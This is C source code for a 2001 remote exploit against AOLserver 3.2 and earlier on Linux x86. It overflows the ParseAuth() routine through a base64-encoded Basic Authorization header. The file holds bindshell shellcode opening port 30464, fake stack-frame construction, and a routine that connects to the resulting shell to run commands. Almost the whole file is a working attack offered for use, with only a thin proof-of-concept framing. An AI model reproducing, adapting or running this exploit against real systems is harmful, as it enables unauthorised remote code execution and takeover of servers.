/*
 * AOLserver version 3.2 and prior Linux x86 remote exploit
 * by qitest1 - Wed Sep 5 17:20:10 CEST 2001 
 *
 * Proof of concept code for exploiting the bof in ParseAuth(). I
 * used this vuln as a playground for some tests, all done on a RH6.2
 * box. The fp will be overwritten by a pointer to a fake frame, with 
 * an fp and an eip pointing to the shellcode. Very unstable, segfault 
 * in most cases. 
 *
 * Greets:	grazer and the other hot guys on #!digit-labs 
 *		teleh0r: come back home fratello! =)
 *
 * ..harder times for 0x69, now at http://digit-labs.org/qitest1..
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>

#define	EIP_POS	260
#define SC_ADDR	0xbf1ff9a8
#define FP	0xbf1ff9a0		
#define FAKE_FP 0xbf1ffaf4

  char shellcode[] = /* Taeho Oh bindshell code at port 30464 */
  "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
  "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
  "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
  "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
  "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
  "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
  "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
  "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
  "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
  "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
  "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
  "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

  int		sockami(char *host, int port);
  void  	shellami(int sock);  
  void		zbuffami(u_long fp, u_long sc_addr, char *zbuf);	
  int		Ns_HtuuEncode(unsigned char *bufin, 
			      unsigned int nbytes, 
			      char * bufcoded);

int
main(int argc, char **argv)
{
  int	sock;
  char	zbuf[1024], ubuf[1024], sbuf[1024];

  printf("\n  AOLserver version 3.3 and prior exploit by qitest1\n\n");

  if(argc == 1)
	{
	  fprintf(stderr, "Usage: %s <target>\n", argv[0]);
	  exit(1);
	}

  printf("+Connecting to %s...\n", argv[1]);
  sock = sockami(argv[1], 80);
  printf("  connected\n");

  printf("+Building buffer with shellcode len: %d...\n", 
  strlen(shellcode)); 
  memset(zbuf, 0x00, sizeof(zbuf));
  zbuffami(FP, SC_ADDR, zbuf);  
  printf("  done\n");

  printf("+Encoding buffer...\n");
  memset(ubuf, 0x00, sizeof(ubuf));
  Ns_HtuuEncode(zbuf, strlen(zbuf), ubuf);
  printf("  done\n");

  printf("+Making http request...\n");
  sprintf(sbuf, 
  "GET / HTTP/1.0\nAuthorization: Basic %s\r\n\r\n", ubuf);
  send(sock, sbuf, strlen(sbuf), 0);
  printf("  done\n");

  printf("+Waiting for the shellcode to be executed...\n  0x69\n");
  sleep(2);
  sock = sockami(argv[1], 30464);
  shellami(sock);
}

int
sockami(char *host, int port)
{
  struct sockaddr_in    address;
  struct hostent        *hp;
  int                   sock;

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock == -1)
        {
          perror("socket()");
          exit(-1);
        }
 
  hp = gethostbyname(host);
  if(hp == NULL)
        {
          perror("gethostbyname()");
          exit(-1);
        }

  memset(&address, 0, sizeof(address));
  memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length);
  address.sin_family = AF_INET;
  address.sin_port = htons(port);

  if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1)
        {
          perror("connect()");
          exit(-1);
        }

  return(sock);
}

void
shellami(int sock)
{
  int             n;
  char            recvbuf[1024], *cmd = "id; uname -a\n";
  fd_set          rset;

  send(sock, cmd, strlen(cmd), 0);

  while (1)
    {
      FD_ZERO(&rset);
      FD_SET(sock, &rset);
      FD_SET(STDIN_FILENO, &rset);
      select(sock+1, &rset, NULL, NULL, NULL);
      if(FD_ISSET(sock, &rset))
        {
          n = read(sock, recvbuf, 1024);
          if (n <= 0)
            {
              printf("Connection closed by foreign host.\n");
              exit(0);
            }
          recvbuf[n] = 0;
          printf("%s", recvbuf);
        }
      if (FD_ISSET(STDIN_FILENO, &rset))
        {
          n = read(STDIN_FILENO, recvbuf, 1024);
          if (n > 0)
            {
              recvbuf[n] = 0;
              write(sock, recvbuf, n);
            }
        }
    }
  return;
}

void
zbuffami(u_long fp, u_long sc_addr, char *zbuf)
{
  int   i, n = 0; 

  for(i = 0; i < EIP_POS; i++)
	zbuf[i] = 0x90; 

  /* Fake frame...
   */
  zbuf[0] = (u_char) (FAKE_FP & 0x000000ff);
  zbuf[1] = (u_char)((FAKE_FP & 0x0000ff00) >> 8); 
  zbuf[2] = (u_char)((FAKE_FP & 0x00ff0000) >> 16);
  zbuf[3] = (u_char)((FAKE_FP & 0xff000000) >> 24);

  zbuf[4] = (u_char) (sc_addr & 0x000000ff);
  zbuf[5] = (u_char)((sc_addr & 0x0000ff00) >> 8);
  zbuf[6] = (u_char)((sc_addr & 0x00ff0000) >> 16);
  zbuf[7] = (u_char)((sc_addr & 0xff000000) >> 24);
	
  for(i = EIP_POS - 4 - strlen(shellcode) - 8; i < EIP_POS - 4 - 8; i++)
        zbuf[i] = shellcode[n++];

  /* Padding...
   */	
  for(n = 0; n < 8 ; n++)
        zbuf[i++] = 0x69;
	
  zbuf[EIP_POS - 4] = (u_char) (fp & 0x000000ff);
  zbuf[EIP_POS - 3] = (u_char)((fp & 0x0000ff00) >> 8);
  zbuf[EIP_POS - 2] = (u_char)((fp & 0x00ff0000) >> 16);
  zbuf[EIP_POS - 1] = (u_char)((fp & 0xff000000) >> 24);

  zbuf[EIP_POS] = 0x00;

  /* Extra junk
   */
  for(i = 0; i < 4; i++)
	strcat(zbuf, "\x69\x69\x69\x69");

  return;
}

  static char    six2pr[64] = 
	{
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
    'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/'
	};

  static unsigned char pr2six[256];

  /* qitest1 and the pleasure of reading... ;pP
   * This routine converts a buffer of bytes to/from RFC 1113
   * printable encoding format.
   * This technique is similar to the familiar Unix uuencode format
   * in that it maps 6 binary bits to one ASCII character (or more
   * aptly, 3 binary bytes to 4 ASCII characters).  However, RFC 1113 
   * does not use the same mapping to printable characters as uuencode. 
   * 
   * Mark Riordan   12 August 1990 and 17 Feb 1991.
   * This code is hereby placed in the public domain. 
   *
   * Encode a single line of binary data to a standard format that
   * uses only printing ASCII characters (but takes up 33% more bytes).
   */
int
Ns_HtuuEncode(unsigned char *bufin, unsigned int nbytes, char * bufcoded)
{

#define ENC(c) six2pr[c]

    register char  *outptr = bufcoded;
    unsigned int    i;

    for (i = 0; i < nbytes; i += 3) {
                /* c1 */
        *(outptr++) = ENC(*bufin >> 2);
                /* c2 */
        *(outptr++) = ENC(((*bufin << 4) & 060) | ((bufin[1] >> 4) & 017));
                /* c3 */
        *(outptr++) = ENC(((bufin[1] << 2) & 074) | ((bufin[2] >> 6) & 03));
                /* c4 */
        *(outptr++) = ENC(bufin[2] & 077);      

        bufin += 3;
    }

    /*
     * If nbytes was not a multiple of 3, then we have encoded too many
     * characters.  Adjust appropriately.
     */
    if (i == nbytes + 1) {
        /* There were only 2 bytes in that last group */
        outptr[-1] = '=';
    } else if (i == nbytes + 2) {
        /* There was only 1 byte in that last group */
        outptr[-1] = '=';
        outptr[-2] = '=';
    }
    *outptr = '\0';
    return (outptr - bufcoded);
}